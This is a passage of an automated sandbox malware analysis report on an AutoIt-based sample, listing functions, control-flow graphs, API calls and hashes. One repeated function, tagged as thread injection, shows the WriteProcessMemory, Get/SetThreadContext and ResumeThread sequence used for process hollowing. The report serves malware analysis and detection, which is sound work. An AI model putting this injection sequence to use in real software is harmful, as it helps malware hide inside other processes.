                                              • PostQuitMessage.USER32(00000000), ref: 00E8378D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: a155cba6a3600b29be3a88c080abb4782dad7887cf1eb0bef3e1a4d3abe26332
                                              • Instruction ID: f6e59c70b82ab04a4de4453d8cd6c0c18cd04c1032cd48a5e2559a0ebedcff20
                                              • Opcode Fuzzy Hash: a155cba6a3600b29be3a88c080abb4782dad7887cf1eb0bef3e1a4d3abe26332
                                              • Instruction Fuzzy Hash: EE416DB51042487BDB147B38CC09BBA3A65E702715F00722AF60EB62E1DA77DB41B711
                                              Function 00E82A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1113 e82a52-e82a8b 1114 ec39f4-ec39f5 DestroyWindow 1113->1114 1115 e82a91-e82aa7 mciSendStringW 1113->1115 1118 ec3a00-ec3a0d 1114->1118 1116 e82d08-e82d15 1115->1116 1117 e82aad-e82ab5 1115->1117 1120 e82d3a-e82d41 1116->1120 1121 e82d17-e82d32 UnregisterHotKey 1116->1121 1117->1118 1119 e82abb-e82aca call e82e70 1117->1119 1123 ec3a3c-ec3a43 1118->1123 1124 ec3a0f-ec3a12 1118->1124 1134 ec3a4a-ec3a56 1119->1134 1135 e82ad0-e82ad8 1119->1135 1120->1117 1122 e82d47 1120->1122 1121->1120 1126 e82d34-e82d35 call e82712 1121->1126 1122->1116 1123->1118 1127 ec3a45 1123->1127 1128 ec3a1e-ec3a21 FindClose 1124->1128 1129 ec3a14-ec3a1c call e87953 1124->1129 1126->1120 1127->1134 1133 ec3a27-ec3a34 1128->1133 1129->1133 1133->1123 1139 ec3a36-ec3a37 call ef3c0b 1133->1139 1136 ec3a58-ec3a5a FreeLibrary 1134->1136 1137 ec3a60-ec3a67 1134->1137 1140 ec3a6e-ec3a7b 1135->1140 1141 e82ade-e82b03 call e8e650 1135->1141 1136->1137 1137->1134 1144 ec3a69 1137->1144 1139->1123 1145 ec3a7d-ec3a9a VirtualFree 1140->1145 1146 ec3aa2-ec3aa9 1140->1146 1150 e82b3a-e82b45 CoUninitialize 1141->1150 1151 e82b05 1141->1151 1144->1140 1145->1146 1148 ec3a9c-ec3a9d call ef3c71 1145->1148 1146->1140 1149 ec3aab 1146->1149 1148->1146 1153 ec3ab0-ec3ab4 1149->1153 1150->1153 1155 e82b4b-e82b50 1150->1155 1154 e82b08-e82b38 call e83047 call e82ff0 1151->1154 1153->1155 1156 ec3aba-ec3ac0 1153->1156 1154->1150 1158 ec3ac5-ec3ad2 call ef3c45 1155->1158 1159 e82b56-e82b60 1155->1159 1156->1155 1171 ec3ad4 1158->1171 1162 e82d49-e82d56 call e9fb27 1159->1162 1163 e82b66-e82b71 call e8bd2c 1159->1163 1162->1163 1173 e82d5c 1162->1173 1174 e82b77 call e82f86 1163->1174 1175 ec3ad9-ec3afb call ea015d 1171->1175 1173->1162 1176 e82b7c-e82be7 call e82e17 call ea01a4 call e82dbe call e8bd2c call e8e650 call e82e40 call ea01a4 1174->1176 1182 ec3afd 1175->1182 1176->1175 1203 e82bed-e82c11 call ea01a4 1176->1203 1185 ec3b02-ec3b24 call ea015d 1182->1185 1190 ec3b26 1185->1190 1193 ec3b2b-ec3b4d call ea015d 1190->1193 1199 ec3b4f 1193->1199 1202 ec3b54-ec3b61 call ee6d63 1199->1202 1209 ec3b63 1202->1209 1203->1185 1208 e82c17-e82c3b call ea01a4 1203->1208 1208->1193 1213 e82c41-e82c5b call ea01a4 1208->1213 1212 ec3b68-ec3b75 call e9bd6a 1209->1212 1217 ec3b77 1212->1217 1213->1202 1219 e82c61-e82c85 call e82e17 call ea01a4 1213->1219 1220 ec3b7c-ec3b89 call ef3b9f 1217->1220 1219->1212 1228 e82c8b-e82c93 1219->1228 1226 ec3b8b 1220->1226 1229 ec3b90-ec3b9d call ef3c26 1226->1229 1228->1220 1230 e82c99-e82caa call e8bd2c call e82f4c 1228->1230 1236 ec3b9f 1229->1236 1237 e82caf-e82cb7 1230->1237 1239 ec3ba4-ec3bb1 call ef3c26 1236->1239 1237->1229 1238 e82cbd-e82ccb 1237->1238 1238->1239 1240 e82cd1-e82d07 call e8bd2c * 3 call e82eb8 1238->1240 1245 ec3bb3 1239->1245 1245->1245
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E82A9B
                                              • CoUninitialize.COMBASE ref: 00E82B3A
                                              • UnregisterHotKey.USER32(?), ref: 00E82D1F
                                              • DestroyWindow.USER32(?), ref: 00EC39F5
                                              • FreeLibrary.KERNEL32(?), ref: 00EC3A5A
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC3A87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 192b55790258fae8e155ed80688fe40e82be3fbde9300dca45f889cbedd5ffab
                                              • Instruction ID: 70f8f1a7a1b843444a6cedf2232bc9ab5d0bb1a4bac04d4cd61904391e8b73d3
                                              • Opcode Fuzzy Hash: 192b55790258fae8e155ed80688fe40e82be3fbde9300dca45f889cbedd5ffab
                                              • Instruction Fuzzy Hash: EBD138317012129FCB29EF25C595BA9F7A0BF15704F15A29DE94E7B252CB32AD22CF40
                                              Function 00EF874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1252 ef874a-ef878c call ec22f0 call e88e70 1257 ef878e-ef879c call e8c92d 1252->1257 1258 ef87a2 1252->1258 1257->1258 1264 ef879e-ef87a0 1257->1264 1259 ef87a4-ef87b0 1258->1259 1262 ef886d-ef891f call e88e70 call e8557e call ead913 call ea93c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 1259->1262 1263 ef87b6 1259->1263 1298 ef8973-ef8984 call e8e650 1262->1298 1299 ef8921-ef892d call eee387 1262->1299 1266 ef87ba-ef87c0 1263->1266 1264->1259 1268 ef87ca-ef87cf 1266->1268 1269 ef87c2-ef87c8 1266->1269 1272 ef87d9-ef87df 1268->1272 1273 ef87d1-ef87d4 1268->1273 1271 ef87d6 1269->1271 1271->1272 1275 ef8848-ef884a 1272->1275 1276 ef87e1-ef87e4 1272->1276 1273->1271 1277 ef884b-ef884e 1275->1277 1276->1275 1279 ef87e6-ef87e9 1276->1279 1280 ef8858 1277->1280 1281 ef8850-ef8856 1277->1281 1283 ef87eb-ef87ee 1279->1283 1284 ef8844-ef8846 1279->1284 1285 ef885c-ef8867 1280->1285 1281->1285 1283->1284 1287 ef87f0-ef87f3 1283->1287 1288 ef883d-ef883e 1284->1288 1285->1262 1285->1266 1290 ef87f5-ef87f8 1287->1290 1291 ef8840-ef8842 1287->1291 1288->1277 1290->1291 1292 ef87fa-ef87fd 1290->1292 1291->1288 1294 ef87ff-ef8802 1292->1294 1295 ef883b 1292->1295 1294->1295 1297 ef8804-ef8807 1294->1297 1295->1288 1301 ef8809-ef880c 1297->1301 1302 ef8834-ef8839 1297->1302 1310 ef8987-ef898b call e8bd2c 1298->1310 1299->1298 1307 ef892f-ef893a call eee9c5 1299->1307 1301->1302 1305 ef880e-ef8811 1301->1305 1302->1277 1308 ef882d-ef8832 1305->1308 1309 ef8813-ef8816 1305->1309 1318 ef89cf 1307->1318 1319 ef8940-ef8967 GetFileAttributesW SetFileAttributesW 1307->1319 1308->1277 1309->1308 1312 ef8818-ef881b 1309->1312 1317 ef8990-ef8998 1310->1317 1315 ef881d-ef8820 1312->1315 1316 ef8826-ef882b 1312->1316 1315->1316 1320 ef899b-ef89af call e8e650 1315->1320 1316->1277 1321 ef89d3-ef89e5 call ef9f9f 1318->1321 1322 ef8969-ef8971 SetCurrentDirectoryW 1319->1322 1323 ef89b1-ef89b3 1319->1323 1320->1317 1330 ef89ea-ef89ec 1321->1330 1322->1298 1325 ef89b5-ef89cd SetCurrentDirectoryW call ea4d13 1323->1325 1326 ef8a02-ef8a0c SetCurrentDirectoryW 1323->1326 1325->1321 1326->1310 1330->1326 1332 ef89ee-ef89fb call e8e650 1330->1332 1332->1326
                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EF8907
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00EF891B
                                              • GetFileAttributesW.KERNEL32(?), ref: 00EF8945
                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00EF895F
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8971
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF89BA
                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00EF8A0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile
                                              • String ID: *.*
                                              • API String ID: 769691225-438819550
                                              • Opcode ID: dfd9364f2f852618d0e4c0b639be678a98b61c498021a8e8e393b8923384f0e3
                                              • Instruction ID: 8c20d04c6c02d215f0ffc03957ea2fd4c1227069bfe9ba1d2fec74d0b28b987c
                                              • Opcode Fuzzy Hash: dfd9364f2f852618d0e4c0b639be678a98b61c498021a8e8e393b8923384f0e3
                                              • Instruction Fuzzy Hash: C481F3725043489FCB24EF14C540ABEB3E8BF85354F94A81EF689E7250EB74D944CB92
                                              Function 00EB90D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1417 eb90d5-eb90e5 1418 eb90ff-eb9101 1417->1418 1419 eb90e7-eb90fa call eaf656 call eaf669 1417->1419 1421 eb9469-eb9476 call eaf656 call eaf669 1418->1421 1422 eb9107-eb910d 1418->1422 1433 eb9481 1419->1433 1439 eb947c call eb2b7c 1421->1439 1422->1421 1425 eb9113-eb913e 1422->1425 1425->1421 1428 eb9144-eb914d 1425->1428 1431 eb914f-eb9162 call eaf656 call eaf669 1428->1431 1432 eb9167-eb9169 1428->1432 1431->1439 1436 eb916f-eb9173 1432->1436 1437 eb9465-eb9467 1432->1437 1438 eb9484-eb9489 1433->1438 1436->1437 1441 eb9179-eb917d 1436->1441 1437->1438 1439->1433 1441->1431 1442 eb917f-eb9196 1441->1442 1445 eb9198-eb919b 1442->1445 1446 eb91b3-eb91bc 1442->1446 1448 eb919d-eb91a3 1445->1448 1449 eb91a5-eb91ae 1445->1449 1450 eb91da-eb91e4 1446->1450 1451 eb91be-eb91d5 call eaf656 call eaf669 call eb2b7c 1446->1451 1448->1449 1448->1451 1452 eb924f-eb9269 1449->1452 1454 eb91eb-eb91ec call eb3bb0 1450->1454 1455 eb91e6-eb91e8 1450->1455 1482 eb939c 1451->1482 1457 eb926f-eb927f 1452->1457 1458 eb933d-eb9346 call ebfc3b 1452->1458 1460 eb91f1-eb9209 call eb2d58 * 2 1454->1460 1455->1454 1457->1458 1463 eb9285-eb9287 1457->1463 1471 eb93b9 1458->1471 1472 eb9348-eb935a 1458->1472 1486 eb920b-eb9221 call eaf669 call eaf656 1460->1486 1487 eb9226-eb924c call eb97b4 1460->1487 1463->1458 1464 eb928d-eb92b3 1463->1464 1464->1458 1468 eb92b9-eb92cc 1464->1468 1468->1458 1473 eb92ce-eb92d0 1468->1473 1475 eb93bd-eb93d5 ReadFile 1471->1475 1472->1471 1477 eb935c-eb936b GetConsoleMode 1472->1477 1473->1458 1478 eb92d2-eb92fd 1473->1478 1480 eb9431-eb943c GetLastError 1475->1480 1481 eb93d7-eb93dd 1475->1481 1477->1471 1483 eb936d-eb9371 1477->1483 1478->1458 1485 eb92ff-eb9312 1478->1485 1488 eb943e-eb9450 call eaf669 call eaf656 1480->1488 1489 eb9455-eb9458 1480->1489 1481->1480 1490 eb93df 1481->1490 1484 eb939f-eb93a9 call eb2d58 1482->1484 1483->1475 1491 eb9373-eb938d ReadConsoleW 1483->1491 1484->1438 1485->1458 1493 eb9314-eb9316 1485->1493 1486->1482 1487->1452 1488->1482 1500 eb945e-eb9460 1489->1500 1501 eb9395-eb939b call eaf633 1489->1501 1497 eb93e2-eb93f4 1490->1497 1498 eb938f GetLastError 1491->1498 1499 eb93ae-eb93b7 1491->1499 1493->1458 1504 eb9318-eb9338 1493->1504 1497->1484 1508 eb93f6-eb93fa 1497->1508 1498->1501 1499->1497 1500->1484 1501->1482 1504->1458 1512 eb93fc-eb940c call eb8df1 1508->1512 1513 eb9413-eb941e 1508->1513 1522 eb940f-eb9411 1512->1522 1514 eb942a-eb942f call eb8c31 1513->1514 1515 eb9420 call eb8f41 1513->1515 1523 eb9425-eb9428 1514->1523 1515->1523 1522->1484 1523->1522
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 343912bdcdb605933a1dc297220f446a304ba6a6180d7bfd29e58491eb337dbd
                                              • Instruction ID: 14fe169f825e79c1a4f6c93bc8171c6bf9aa49d312665564d8d864e0bb4513f1
                                              • Opcode Fuzzy Hash: 343912bdcdb605933a1dc297220f446a304ba6a6180d7bfd29e58491eb337dbd
                                              • Instruction Fuzzy Hash: 18C1C370A04249AFDB11DFE8D881BEEBBF4AF49304F145199EA24BB393C7349941CB61
                                              Function 00E8353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83568
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83589
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E8359D
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E835A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 0fd9f768dac7fde873a5e587fc7a9f42c3b0cdde62c5a8ffed37e87c1a164354
                                              • Instruction ID: 3b706ddb0be33de32c0db37625492fe8eb0d83049f21862efad5e484579c0ed0
                                              • Opcode Fuzzy Hash: 0fd9f768dac7fde873a5e587fc7a9f42c3b0cdde62c5a8ffed37e87c1a164354
                                              • Instruction Fuzzy Hash: 0EF017716403987AE76147136C08E773FBDD7C7F11B02011EBA04A61A0C26A0881FAB0
                                              Function 012AAD4C Relevance: 7.7, APIs: 5, Instructions: 173threadinjectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              Function 012AAD4C Relevance: 7.7, APIs: 5, Instructions: 173threadinjectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 0121A000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              Function 012AAD4C Relevance: 7.7, APIs: 5, Instructions: 173threadinjectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              Function 012AAD4C Relevance: 7.7, APIs: 5, Instructions: 173threadinjectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              Function 00EB3188 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(0000000A,?,?,00EAF66E,00EA547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB318D
                                              • _free.LIBCMT ref: 00EB31C2
                                              • _free.LIBCMT ref: 00EB31E9
                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB31F6
                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB31FF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 5390cff0c3fd2044f038ee2c03eb6e0e90583b361f40463d0e54ffd158e019b5
                                              • Instruction ID: e33c6387562701cbe97f8803336530c9e0acfef25f94ad8e7d5bc54a49d97fe1
                                              • Opcode Fuzzy Hash: 5390cff0c3fd2044f038ee2c03eb6e0e90583b361f40463d0e54ffd158e019b5
                                              • Instruction Fuzzy Hash: 8301783A303A1537D212233C5C4BDEB32AEAFC5375F212428F925F2191EE20CE022020
                                              Function 00E855F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8561C
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8563D
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8565F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
